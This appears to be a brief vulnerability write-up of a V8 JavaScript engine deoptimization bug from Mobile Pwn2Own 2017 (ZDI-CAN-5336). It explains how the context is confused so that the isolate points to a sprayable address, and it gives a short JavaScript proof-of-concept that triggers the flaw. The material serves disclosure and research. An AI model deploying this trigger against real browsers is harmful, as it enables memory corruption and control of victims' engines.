Pwn2own: V8 - isolate control via function deoptimization
随机文章Mobile Pwn2Own 2017 V8 ZDI-CAN-5336 漏洞 PoC
The following bug was disclosed by ZDI during pacsec/mobile pwn2own 2017. Reference ZDI-CAN-5336
When the function deoptmizes, v8 engine has to restore the context. And in this function, deoptimizer doesn't work properly, the context is confused to an arguments_marker after the deoptimization and the isolate point to 0x7ff00000. So after we spray to control this address, we also control the isolate.
poc:
function SDD() {
function foo() {}
foo[0] = 0;
foo.prototype = 0;
try {
throw 0;
} catch(e) {
[0].forEach(bar);
}
function bar() {
foo[200];
}
for (var i = 0; i < 0x2000000; ++i) {}
}
SDD();
SDD();
SDD();